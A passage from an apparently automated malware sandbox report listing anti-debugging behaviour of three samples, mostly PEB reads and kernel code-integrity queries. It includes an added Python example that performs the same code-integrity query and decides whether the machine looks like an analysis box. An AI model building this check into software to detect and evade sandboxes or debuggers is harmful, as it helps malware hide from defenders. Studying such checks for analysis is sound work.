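Run it on the sandbox guest to see exactly what the sample saw; run it anywhere else and it classifies the IDs quoted from this report. Note that Msft virtual DVD entries are reported separately because they also appear on bare metal whenever an ISO is mounted, so they should not be taken as proof of a VM on their own.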

Anti Debugging:

barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\cnv622JnZv.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\8615.exe System information queried: CodeIntegrityInformation
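Three of the processes above query SystemCodeIntegrityInformation. The call returns a flag word describing the kernel's code-integrity state; two of its bits, TESTSIGN and DEBUGMODE_ENABLED, are set on machines booted with test-signing or kernel debugging enabled, which is how many analysis VMs load unsigned monitoring drivers or attach a kernel debugger. The Python below is an added example, not the sample's code: it issues the same NtQuerySystemInformation call through ctypes on Windows, decodes the result with the CODEINTEGRITY_OPTION_* values from winnt.h, and returns the verdict such a check would reach. Treating either of those two bits as "analysis machine" is an assumption about what a sample keys on, not something this report states.

```python
"""Query kernel code-integrity state the way the processes above do (Windows only),
and decode the returned options offline.  Added example, not the sample's code."""
import ctypes
import sys
from typing import List

SystemCodeIntegrityInformation = 103  # SYSTEM_INFORMATION_CLASS value

# CODEINTEGRITY_OPTION_* bits as defined in winnt.h.
CODEINTEGRITY_OPTIONS = {
    0x0001: "ENABLED",
    0x0002: "TESTSIGN",
    0x0004: "UMCI_ENABLED",
    0x0008: "UMCI_AUDITMODE_ENABLED",
    0x0010: "UMCI_EXCLUSIONPATHS_ENABLED",
    0x0020: "TEST_BUILD",
    0x0040: "PREPRODUCTION_BUILD",
    0x0080: "DEBUGMODE_ENABLED",
    0x0100: "FLIGHT_BUILD",
    0x0200: "FLIGHTING_ENABLED",
    0x0400: "HVCI_KMCI_ENABLED",
    0x0800: "HVCI_KMCI_AUDITMODE_ENABLED",
    0x1000: "HVCI_KMCI_STRICTMODE_ENABLED",
    0x2000: "HVCI_IUM_ENABLED",
}

# Bits an evasive sample would read as "analysis machine" (assumed threshold).
ANALYSIS_BITS = 0x0002 | 0x0080  # TESTSIGN | DEBUGMODE_ENABLED


class SYSTEM_CODEINTEGRITY_INFORMATION(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_ulong),
                ("CodeIntegrityOptions", ctypes.c_ulong)]


def query_code_integrity_options() -> int:
    """NtQuerySystemInformation(SystemCodeIntegrityInformation); raises off Windows."""
    if sys.platform != "win32":
        raise OSError("NtQuerySystemInformation is only available on Windows")
    ntdll = ctypes.WinDLL("ntdll")
    info = SYSTEM_CODEINTEGRITY_INFORMATION()
    info.Length = ctypes.sizeof(info)  # the kernel rejects a wrong Length
    returned = ctypes.c_ulong(0)
    status = ntdll.NtQuerySystemInformation(
        SystemCodeIntegrityInformation, ctypes.byref(info),
        ctypes.sizeof(info), ctypes.byref(returned))
    if status != 0:  # NTSTATUS, negative on failure
        raise OSError(f"NtQuerySystemInformation failed: 0x{status & 0xFFFFFFFF:08X}")
    return info.CodeIntegrityOptions


def decode_options(options: int) -> List[str]:
    """Names of the CODEINTEGRITY_OPTION_* bits set in options, low bit first;
    bits not in the table are reported as hex so nothing is silently dropped."""
    names = []
    remaining = options
    for bit, name in sorted(CODEINTEGRITY_OPTIONS.items()):
        if options & bit:
            names.append(name)
            remaining &= ~bit
    if remaining:
        names.append(f"UNKNOWN_0x{remaining:X}")
    return names


def looks_like_analysis_box(options: int) -> bool:
    """Verdict such a check reaches: test-signing or kernel debugging is on."""
    return bool(options & ANALYSIS_BITS)


if __name__ == "__main__":
    flags = query_code_integrity_options()
    print(f"CodeIntegrityOptions = 0x{flags:X}: {', '.join(decode_options(flags))}")
    print("analysis box?", looks_like_analysis_box(flags))
```

A sandbox guest that runs with `bcdedit /set testsigning on` or a kernel debugger attached answers this query with TESTSIGN or DEBUGMODE_ENABLED set; a production box normally returns ENABLED alone. Since the struct is the same on x86 and x64, the block runs unchanged under either Python build.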
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_00427590 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00427590
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_02EBD727 push dword ptr fs:[00000030h] 0_2_02EBD727
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 17_2_02BA0042 push dword ptr fs:[00000030h] 17_2_02BA0042
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F340 mov eax, dword ptr fs:[00000030h] 24_2_6B47F340
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47DB40 mov eax, dword ptr fs:[00000030h] 24_2_6B47DB40
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548B58 mov eax, dword ptr fs:[00000030h] 24_2_6B548B58
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A3B5A mov eax, dword ptr fs:[00000030h] 24_2_6B4A3B5A (4 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F358 mov eax, dword ptr fs:[00000030h] 24_2_6B47F358
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A3B7A mov eax, dword ptr fs:[00000030h] 24_2_6B4A3B7A (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B506365 mov eax, dword ptr fs:[00000030h] 24_2_6B506365 (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 mov eax, dword ptr fs:[00000030h] 24_2_6B49A309 (21 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53131B mov eax, dword ptr fs:[00000030h] 24_2_6B53131B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52E33D mov eax, dword ptr fs:[00000030h] 24_2_6B52E33D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B504320 mov eax, dword ptr fs:[00000030h] 24_2_6B504320
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F53CA mov eax, dword ptr fs:[00000030h] 24_2_6B4F53CA (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49DBE9 mov eax, dword ptr fs:[00000030h] 24_2_6B49DBE9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B471BE9 mov eax, dword ptr fs:[00000030h] 24_2_6B471BE9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4723F6 mov eax, dword ptr fs:[00000030h] 24_2_6B4723F6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5223E3 mov ecx, dword ptr fs:[00000030h] 24_2_6B5223E3 (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5223E3 mov eax, dword ptr fs:[00000030h] 24_2_6B5223E3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B483BF4 mov eax, dword ptr fs:[00000030h] 24_2_6B483BF4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B483BF4 mov ecx, dword ptr fs:[00000030h] 24_2_6B483BF4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52D380 mov ecx, dword ptr fs:[00000030h] 24_2_6B52D380
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474B94 mov edi, dword ptr fs:[00000030h] 24_2_6B474B94
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53138A mov eax, dword ptr fs:[00000030h] 24_2_6B53138A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B51EB8A mov ecx, dword ptr fs:[00000030h] 24_2_6B51EB8A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B51EB8A mov eax, dword ptr fs:[00000030h] 24_2_6B51EB8A (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548BB6 mov eax, dword ptr fs:[00000030h] 24_2_6B548BB6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4BAD mov eax, dword ptr fs:[00000030h] 24_2_6B4A4BAD (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B549BBE mov eax, dword ptr fs:[00000030h] 24_2_6B549BBE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B531BA8 mov eax, dword ptr fs:[00000030h] 24_2_6B531BA8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472240 mov ecx, dword ptr fs:[00000030h] 24_2_6B472240
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472240 mov eax, dword ptr fs:[00000030h] 24_2_6B472240
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479240 mov eax, dword ptr fs:[00000030h] 24_2_6B479240 (4 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B504257 mov eax, dword ptr fs:[00000030h] 24_2_6B504257
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B504248 mov eax, dword ptr fs:[00000030h] 24_2_6B504248
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B927A mov eax, dword ptr fs:[00000030h] 24_2_6B4B927A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52B260 mov eax, dword ptr fs:[00000030h] 24_2_6B52B260 (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548A62 mov eax, dword ptr fs:[00000030h] 24_2_6B548A62
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B488A0A mov eax, dword ptr fs:[00000030h] 24_2_6B488A0A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B493A1C mov eax, dword ptr fs:[00000030h] 24_2_6B493A1C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475210 mov eax, dword ptr fs:[00000030h] 24_2_6B475210
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475210 mov ecx, dword ptr fs:[00000030h] 24_2_6B475210
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475210 mov eax, dword ptr fs:[00000030h] 24_2_6B475210 (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52D208 mov eax, dword ptr fs:[00000030h] 24_2_6B52D208 (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A229 mov eax, dword ptr fs:[00000030h] 24_2_6B49A229 (9 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474A20 mov eax, dword ptr fs:[00000030h] 24_2_6B474A20 (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4FEA20 mov eax, dword ptr fs:[00000030h] 24_2_6B4FEA20
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B478239 mov eax, dword ptr fs:[00000030h] 24_2_6B478239 (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2ACB mov eax, dword ptr fs:[00000030h] 24_2_6B4A2ACB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475AC0 mov eax, dword ptr fs:[00000030h] 24_2_6B475AC0 (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548ADD mov eax, dword ptr fs:[00000030h] 24_2_6B548ADD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473ACA mov eax, dword ptr fs:[00000030h] 24_2_6B473ACA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2AE4 mov eax, dword ptr fs:[00000030h] 24_2_6B4A2AE4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF mov eax, dword ptr fs:[00000030h] 24_2_6B534AEF (14 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ADA88 mov eax, dword ptr fs:[00000030h] 24_2_6B4ADA88 (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AD294 mov eax, dword ptr fs:[00000030h] 24_2_6B4AD294 (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4752A5 mov eax, dword ptr fs:[00000030h] 24_2_6B4752A5 (5 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B471AA0 mov eax, dword ptr fs:[00000030h] 24_2_6B471AA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A5AA0 mov eax, dword ptr fs:[00000030h] 24_2_6B4A5AA0 (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A12BD mov esi, dword ptr fs:[00000030h] 24_2_6B4A12BD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A12BD mov eax, dword ptr fs:[00000030h] 24_2_6B4A12BD (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48AAB0 mov eax, dword ptr fs:[00000030h] 24_2_6B48AAB0 (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49B944 mov eax, dword ptr fs:[00000030h] 24_2_6B49B944 (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47395E mov eax, dword ptr fs:[00000030h] 24_2_6B47395E (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53E962 mov eax, dword ptr fs:[00000030h] 24_2_6B53E962
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548966 mov eax, dword ptr fs:[00000030h] 24_2_6B548966
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B171 mov eax, dword ptr fs:[00000030h] 24_2_6B47B171
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B171 mov eax, dword ptr fs:[00000030h] 24_2_6B47B171
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479100 mov eax, dword ptr fs:[00000030h] 24_2_6B479100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479100 mov eax, dword ptr fs:[00000030h] 24_2_6B479100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B479100 mov eax, dword ptr fs:[00000030h] 24_2_6B479100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B480100 mov eax, dword ptr fs:[00000030h] 24_2_6B480100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B480100 mov eax, dword ptr fs:[00000030h] 24_2_6B480100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B480100 mov eax, dword ptr fs:[00000030h] 24_2_6B480100
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B494120 mov eax, dword ptr fs:[00000030h] 24_2_6B494120
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B494120 mov eax, dword ptr fs:[00000030h] 24_2_6B494120
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B494120 mov eax, dword ptr fs:[00000030h] 24_2_6B494120
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B494120 mov eax, dword ptr fs:[00000030h] 24_2_6B494120
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B494120 mov ecx, dword ptr fs:[00000030h] 24_2_6B494120
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A513A mov eax, dword ptr fs:[00000030h] 24_2_6B4A513A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A513A mov eax, dword ptr fs:[00000030h] 24_2_6B4A513A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473138 mov ecx, dword ptr fs:[00000030h] 24_2_6B473138
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4899C7 mov eax, dword ptr fs:[00000030h] 24_2_6B4899C7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4899C7 mov eax, dword ptr fs:[00000030h] 24_2_6B4899C7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4899C7 mov eax, dword ptr fs:[00000030h] 24_2_6B4899C7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4899C7 mov eax, dword ptr fs:[00000030h] 24_2_6B4899C7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B1E1 mov eax, dword ptr fs:[00000030h] 24_2_6B47B1E1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B1E1 mov eax, dword ptr fs:[00000030h] 24_2_6B47B1E1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B1E1 mov eax, dword ptr fs:[00000030h] 24_2_6B47B1E1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4731E0 mov eax, dword ptr fs:[00000030h] 24_2_6B4731E0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5489E7 mov eax, dword ptr fs:[00000030h] 24_2_6B5489E7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5041E8 mov eax, dword ptr fs:[00000030h] 24_2_6B5041E8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49C182 mov eax, dword ptr fs:[00000030h] 24_2_6B49C182
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AA185 mov eax, dword ptr fs:[00000030h] 24_2_6B4AA185
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47519E mov eax, dword ptr fs:[00000030h] 24_2_6B47519E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47519E mov ecx, dword ptr fs:[00000030h] 24_2_6B47519E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53A189 mov eax, dword ptr fs:[00000030h] 24_2_6B53A189
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53A189 mov ecx, dword ptr fs:[00000030h] 24_2_6B53A189
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4190 mov eax, dword ptr fs:[00000030h] 24_2_6B4A4190
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2990 mov eax, dword ptr fs:[00000030h] 24_2_6B4A2990
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54F1B5 mov eax, dword ptr fs:[00000030h] 24_2_6B54F1B5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54F1B5 mov eax, dword ptr fs:[00000030h] 24_2_6B54F1B5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A61A0 mov eax, dword ptr fs:[00000030h] 24_2_6B4A61A0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A61A0 mov eax, dword ptr fs:[00000030h] 24_2_6B4A61A0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F51BE mov eax, dword ptr fs:[00000030h] 24_2_6B4F51BE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F51BE mov eax, dword ptr fs:[00000030h] 24_2_6B4F51BE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F51BE mov eax, dword ptr fs:[00000030h] 24_2_6B4F51BE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F51BE mov eax, dword ptr fs:[00000030h] 24_2_6B4F51BE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AC9BF mov eax, dword ptr fs:[00000030h] 24_2_6B4AC9BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AC9BF mov eax, dword ptr fs:[00000030h] 24_2_6B4AC9BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov eax, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov eax, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov eax, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov ecx, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF mov eax, dword ptr fs:[00000030h] 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5349A4 mov eax, dword ptr fs:[00000030h] 24_2_6B5349A4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5349A4 mov eax, dword ptr fs:[00000030h] 24_2_6B5349A4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5349A4 mov eax, dword ptr fs:[00000030h] 24_2_6B5349A4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5349A4 mov eax, dword ptr fs:[00000030h] 24_2_6B5349A4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B477055 mov eax, dword ptr fs:[00000030h] 24_2_6B477055
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475050 mov eax, dword ptr fs:[00000030h] 24_2_6B475050
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475050 mov eax, dword ptr fs:[00000030h] 24_2_6B475050
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475050 mov eax, dword ptr fs:[00000030h] 24_2_6B475050
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B532073 mov eax, dword ptr fs:[00000030h] 24_2_6B532073
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B541074 mov eax, dword ptr fs:[00000030h] 24_2_6B541074
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49F86D mov eax, dword ptr fs:[00000030h] 24_2_6B49F86D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B544015 mov eax, dword ptr fs:[00000030h] 24_2_6B544015
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B544015 mov eax, dword ptr fs:[00000030h] 24_2_6B544015
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476800 mov eax, dword ptr fs:[00000030h] 24_2_6B476800
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476800 mov eax, dword ptr fs:[00000030h] 24_2_6B476800
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476800 mov eax, dword ptr fs:[00000030h] 24_2_6B476800
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B488800 mov eax, dword ptr fs:[00000030h] 24_2_6B488800
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54F019 mov eax, dword ptr fs:[00000030h] 24_2_6B54F019
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B54F019 mov eax, dword ptr fs:[00000030h] 24_2_6B54F019
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F018 mov eax, dword ptr fs:[00000030h] 24_2_6B47F018
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F018 mov eax, dword ptr fs:[00000030h] 24_2_6B47F018
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48B02A mov eax, dword ptr fs:[00000030h] 24_2_6B48B02A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48B02A mov eax, dword ptr fs:[00000030h] 24_2_6B48B02A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48B02A mov eax, dword ptr fs:[00000030h] 24_2_6B48B02A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48B02A mov eax, dword ptr fs:[00000030h] 24_2_6B48B02A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4020 mov edi, dword ptr fs:[00000030h] 24_2_6B4A4020
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A830 mov eax, dword ptr fs:[00000030h] 24_2_6B49A830
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A830 mov eax, dword ptr fs:[00000030h] 24_2_6B49A830
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A830 mov eax, dword ptr fs:[00000030h] 24_2_6B49A830
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A830 mov eax, dword ptr fs:[00000030h] 24_2_6B49A830
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4770C0 mov eax, dword ptr fs:[00000030h] 24_2_6B4770C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4770C0 mov eax, dword ptr fs:[00000030h] 24_2_6B4770C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4740E1 mov eax, dword ptr fs:[00000030h] 24_2_6B4740E1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4740E1 mov eax, dword ptr fs:[00000030h] 24_2_6B4740E1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4740E1 mov eax, dword ptr fs:[00000030h] 24_2_6B4740E1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4758EC mov eax, dword ptr fs:[00000030h] 24_2_6B4758EC
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49B8E4 mov eax, dword ptr fs:[00000030h] 24_2_6B49B8E4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49B8E4 mov eax, dword ptr fs:[00000030h] 24_2_6B49B8E4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828FD mov eax, dword ptr fs:[00000030h] 24_2_6B4828FD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828FD mov eax, dword ptr fs:[00000030h] 24_2_6B4828FD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828FD mov eax, dword ptr fs:[00000030h] 24_2_6B4828FD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52E0E9 mov eax, dword ptr fs:[00000030h] 24_2_6B52E0E9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52E0E9 mov eax, dword ptr fs:[00000030h] 24_2_6B52E0E9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473880 mov eax, dword ptr fs:[00000030h] 24_2_6B473880
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473880 mov eax, dword ptr fs:[00000030h] 24_2_6B473880
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B90AF mov eax, dword ptr fs:[00000030h] 24_2_6B4B90AF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h] 24_2_6B4828AE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h] 24_2_6B4828AE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828AE mov eax, dword ptr fs:[00000030h] 24_2_6B4828AE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4828AE mov ecx, dword ptr fs:[00000030h] 24_2_6B4828AE
